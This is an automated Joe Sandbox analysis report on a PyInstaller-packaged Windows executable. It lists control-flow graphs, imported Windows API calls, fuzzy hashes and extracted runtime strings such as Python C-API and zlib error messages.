7ff79ea5885d-7ff79ea58860 891->898 899 7ff79ea58862-7ff79ea58872 call 7ff79ea5137c call 7ff79ea5135c 891->899 893->888 894->878 900 7ff79ea586dc-7ff79ea586ea 894->900 895->891 896->895 898->845 898->899 899->884 900->876 901 7ff79ea586f0 900->901 905 7ff79ea586f3-7ff79ea5870a call 7ff79ea5f384 901->905 915 7ff79ea5870c-7ff79ea58716 905->915 916 7ff79ea58742-7ff79ea5874b GetLastError 905->916 917 7ff79ea58718-7ff79ea5872a call 7ff79ea5f384 915->917 918 7ff79ea58733-7ff79ea5873a 915->918 916->876 917->916 922 7ff79ea5872c-7ff79ea58731 917->922 918->876 920 7ff79ea58740 918->920 920->905 922->918
                                                  APIs
                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF79EA585FA
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79EA58577,?,?,?,00007FF79EA5334F), ref: 00007FF79EA586B8
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79EA58577,?,?,?,00007FF79EA5334F), ref: 00007FF79EA58742
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2210144848-0
                                                  • Opcode ID: 45cbb135cd0f85d1d846e2e465f9ea49a45de6ab8f9da7c0c0df81e094fb2cd4
                                                  • Instruction ID: a54133e2aa2c4962c04ab44bf8589ee872aedfe28775b3ced22d1d0701fad03c
                                                  • Opcode Fuzzy Hash: 45cbb135cd0f85d1d846e2e465f9ea49a45de6ab8f9da7c0c0df81e094fb2cd4
                                                  • Instruction Fuzzy Hash: 5A817022E18652A9FB70BB7598C0ABCA7A1FB54BA4F844135DE0E536B1DF3CA445C730

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 4144305933-0
                                                  • Opcode ID: 902934ce287785604c65689b262d124d2bfc3c88a04624b8aa705ccf2e41092b
                                                  • Instruction ID: d2a96130dfba234a6a2ab14c7937107e0edb631d460a7ea7ba34ed218b4910fb
                                                  • Opcode Fuzzy Hash: 902934ce287785604c65689b262d124d2bfc3c88a04624b8aa705ccf2e41092b
                                                  • Instruction Fuzzy Hash: 4D314820E0964245FA75BB7595D5BB9E281EF81784FC54034E90E4B2F3EE2DA8448331

                                                  Control-flow Graph

                                                  control_flow_graph 1015 7ff79ea5b2d4-7ff79ea5b311 1016 7ff79ea5b4bc-7ff79ea5b4c7 call 7ff79ea5137c 1015->1016 1017 7ff79ea5b317-7ff79ea5b31d 1015->1017 1023 7ff79ea5b4cb-7ff79ea5b4e7 call 7ff79ea4bbf0 1016->1023 1017->1016 1018 7ff79ea5b323-7ff79ea5b32b 1017->1018 1018->1016 1020 7ff79ea5b331-7ff79ea5b334 1018->1020 1020->1016 1022 7ff79ea5b33a-7ff79ea5b34b 1020->1022 1024 7ff79ea5b34d-7ff79ea5b356 call 7ff79ea5b274 1022->1024 1025 7ff79ea5b375-7ff79ea5b379 1022->1025 1024->1016 1032 7ff79ea5b35c-7ff79ea5b35f 1024->1032 1025->1016 1029 7ff79ea5b37f-7ff79ea5b383 1025->1029 1029->1016 1031 7ff79ea5b389-7ff79ea5b38d 1029->1031 1031->1016 1033 7ff79ea5b393-7ff79ea5b3a3 call 7ff79ea5b274 1031->1033 1032->1016 1034 7ff79ea5b365-7ff79ea5b368 1032->1034 1038 7ff79ea5b3ac call 7ff79ea61acc 1033->1038 1039 7ff79ea5b3a5-7ff79ea5b3a8 1033->1039 1034->1016 1036 7ff79ea5b36e 1034->1036 1036->1025 1042 7ff79ea5b3b1-7ff79ea5b3c8 call 7ff79ea60ec8 1038->1042 1039->1038 1040 7ff79ea5b3aa 1039->1040 1040->1038 1045 7ff79ea5b3ce-7ff79ea5b3d9 call 7ff79ea60ef8 1042->1045 1046 7ff79ea5b4e8-7ff79ea5b4ff call 7ff79ea567e8 1042->1046 1045->1046 1051 7ff79ea5b3df-7ff79ea5b3ea call 7ff79ea60f28 1045->1051 1051->1046 1054 7ff79ea5b3f0-7ff79ea5b481 1051->1054 1055 7ff79ea5b4b7-7ff79ea5b4ba 1054->1055 1056 7ff79ea5b483-7ff79ea5b49d 1054->1056 1055->1023 1057 7ff79ea5b49f-7ff79ea5b4a3 1056->1057 1058 7ff79ea5b4b2-7ff79ea5b4b5 1056->1058 1057->1058 1059 7ff79ea5b4a5-7ff79ea5b4b0 call 7ff79ea61b0c 1057->1059 1058->1023 1059->1055 1059->1058
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _get_daylight$_isindst
                                                  • String ID:
                                                  • API String ID: 4170891091-0
                                                  • Opcode ID: 9b03c73119b101001587424fb7506d1f48776e9a435598c7eabfeca695007573
                                                  • Instruction ID: e1019eea12561b81a1be1de34916ff9583439095cca5c6f467e54f29dd393e45
                                                  • Opcode Fuzzy Hash: 9b03c73119b101001587424fb7506d1f48776e9a435598c7eabfeca695007573
                                                  • Instruction Fuzzy Hash: 3651A372F045128AEB34EB7499C1ABCB7A1FB5035AF900139DE1E56AF5DF3CA5428720
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateDriveFileHandleType_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2907017715-0
                                                  APIs
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: try_get_function
                                                  • String ID: AppPolicyGetProcessTerminationMethod
                                                  • API String ID: 2742660187-2031265017
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  APIs
                                                  Similarity
                                                  • API ID: ChangeCloseErrorFindLastNotification
                                                  • String ID:
                                                  • API String ID: 1687624791-0
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(?,?,?,00007FF79EA5864F,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA58577), ref: 00007FF79EA57964
                                                  • GetLastError.KERNEL32(?,?,?,00007FF79EA5864F,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA58577), ref: 00007FF79EA5796E
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer
                                                  • String ID:
                                                  • API String ID: 2976181284-0
                                                  APIs
                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA53B51), ref: 00007FF79EA53CF7
                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA53B51), ref: 00007FF79EA53D0D
                                                  Similarity
                                                  • API ID: Time$System$FileLocalSpecific
                                                  • String ID:
                                                  • API String ID: 1707611234-0
                                                  APIs
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 2018770650-0
                                                  APIs
                                                  Similarity
                                                  • API ID: DirectoryErrorLastRemove
                                                  • String ID:
                                                  • API String ID: 377330604-0
                                                  APIs
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_findclose
                                                  • String ID:
                                                  • API String ID: 2772937645-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _fread_nolock
                                                  • String ID:
                                                  • API String ID: 840049012-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  APIs
                                                  Similarity
                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                  • String ID:
                                                  • API String ID: 3947729631-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF79EA59809,?,?,00000000,00007FF79EA51385,?,?,?,?,00007FF79EA56855), ref: 00007FF79EA5A6FD
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF79EA51577,?,?,?,?,?,?,?,00007FF79EA4290B), ref: 00007FF79EA58C3E
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 5131db3b9d397febd42fe8dcaac256292aabfb728f08fa2f2e4777bcacc41136
                                                  • Instruction ID: a526673a9d000de5d54e59418d7586c4acdc6157ff618549bfe7fe5acdf7cff0
                                                  • Opcode Fuzzy Hash: 5131db3b9d397febd42fe8dcaac256292aabfb728f08fa2f2e4777bcacc41136
                                                  • Instruction Fuzzy Hash: 9CE0EC64E096074AF6743BB449C2D7DF190CFA8390F844474EB09062F7DD1D68585631
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: LanguagesPreferredRestoreThread
                                                  • String ID:
                                                  • API String ID: 1765668137-0
                                                  • Opcode ID: 7d709474b1a4bf75fc575d481edd2e8fc45b698afa591cb20bc82c2b9fe51d91
                                                  • Instruction ID: 0ee84b1be6be4b7c00f6021233c0ac43268d26487e93129a811d9cb7dc441b97
                                                  • Opcode Fuzzy Hash: 7d709474b1a4bf75fc575d481edd2e8fc45b698afa591cb20bc82c2b9fe51d91
                                                  • Instruction Fuzzy Hash: F6D0C991E1984346FA78B7B368D59399291DFF9B50F844430D81D81671EE1C659542B0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DirectoryErrorLastRemove
                                                  • String ID:
                                                  • API String ID: 377330604-0
                                                  • Opcode ID: 71f1e042a03ee4b45df1047b1ddf8681d2a769f87646e79ab316bda138fac715
                                                  • Instruction ID: 82fb887219773ff840c83c7c82f376e0787dc8f2fd4ea5290aee36dee4ac55b9
                                                  • Opcode Fuzzy Hash: 71f1e042a03ee4b45df1047b1ddf8681d2a769f87646e79ab316bda138fac715
                                                  • Instruction Fuzzy Hash: 73417616D1C6C591E621AB34A5516BCA360FBA5784F959232EF8D42163FF28B6C8C330
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AddressProc
                                                  • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                  • API String ID: 190572456-4266016200
                                                  • Opcode ID: 14785d6e7bc2baf3401dc5b349dbbd6f73f8c7ddb60bebd002ee515bd7b7ae54
                                                  • Instruction ID: 7545ca3fbd3d9e9d0044cfe652b6e2c646e4a87ecad510b11e32ee6bf1e2fd0b
                                                  • Opcode Fuzzy Hash: 14785d6e7bc2baf3401dc5b349dbbd6f73f8c7ddb60bebd002ee515bd7b7ae54
                                                  • Instruction Fuzzy Hash: 6412B464A19F0395FE79EB25ACD0874A6A1EF46B44BC65431D80E063B4FF7CE9498330
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                  • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                  • API String ID: 2446303242-1601438679
                                                  • Opcode ID: 6259fad1ac732275e9b31943f0bc06070114494923621a8928dbeeeacfcbb0ed
                                                  • Instruction ID: 1d88dbe607d02b34136b973a87174a43e777f2a12b60fb21657ce4becfc8348a
                                                  • Opcode Fuzzy Hash: 6259fad1ac732275e9b31943f0bc06070114494923621a8928dbeeeacfcbb0ed
                                                  • Instruction Fuzzy Hash: CDA15136218B8187D7249F21E494BAEB770F789B84F904126DB8D43B24DF7DE165CB60
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 808467561-2761157908
                                                  • Opcode ID: b4ac3ca9d165bd3345c25ccf605b050a00ed4afb5e75d50575a3e41fada79be9
                                                  • Instruction ID: bd3b419ff169b23e22d81d345b0e15a027ed60556c0cd3acce9732f1fe8d164d
                                                  • Opcode Fuzzy Hash: b4ac3ca9d165bd3345c25ccf605b050a00ed4afb5e75d50575a3e41fada79be9
                                                  • Instruction Fuzzy Hash: 40B21672A186828BE7759F34D4C0BFDB7A1FB55788F801135DA0D57AA8DF38A940CB60
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,00007FF79EA42A60), ref: 00007FF79EA48487
                                                  • FormatMessageW.KERNEL32(00000000,00007FF79EA42A60), ref: 00007FF79EA484B6
                                                  • WideCharToMultiByte.KERNEL32 ref: 00007FF79EA4850C
                                                    • Part of subcall function 00007FF79EA429E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79EA486F3,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA42A14
                                                    • Part of subcall function 00007FF79EA429E0: MessageBoxW.USER32 ref: 00007FF79EA42AEC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                  • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                  • API String ID: 2920928814-2573406579
                                                  • Opcode ID: 8a7c589bd815277da55e5032dbfaf14fad2e1b33d14a13ff34ff4e95c7544bc2
                                                  • Instruction ID: 2be9fe78b642ea5efa633c6bcaa93fd964e0134f57ab31533e386005c997c0d3
                                                  • Opcode Fuzzy Hash: 8a7c589bd815277da55e5032dbfaf14fad2e1b33d14a13ff34ff4e95c7544bc2
                                                  • Instruction Fuzzy Hash: 4E216031A18E42A6EB70AB31F8D0A76A265FB89794FC40035E64D826B5EF3CD145C730
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                  • API String ID: 0-2665694366
                                                  • Opcode ID: c9fd51c14d71560020b511e4453ea2e6ada1d51fd66898c83da3cb6eb71852f9
                                                  • Instruction ID: e686b4a1bff259c99e7fb136f0f22e662af6937e24821a3fdd5b6db10366cc4b
                                                  • Opcode Fuzzy Hash: c9fd51c14d71560020b511e4453ea2e6ada1d51fd66898c83da3cb6eb71852f9
                                                  • Instruction Fuzzy Hash: F152C572A146A687D7A49F28D4C8E7E77ADEB84340F514139E649837D0FB3DD944CB20
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: e2d8ec37f49102d448cf8ff6e1cc4a7b9f10d5f9e58c255e7ae627ab0bceba52
                                                  • Instruction ID: 6fb8c90c4bf9a76486a1ac03354a4e67dbd641bc4a95c5205ce0852309881353
                                                  • Opcode Fuzzy Hash: e2d8ec37f49102d448cf8ff6e1cc4a7b9f10d5f9e58c255e7ae627ab0bceba52
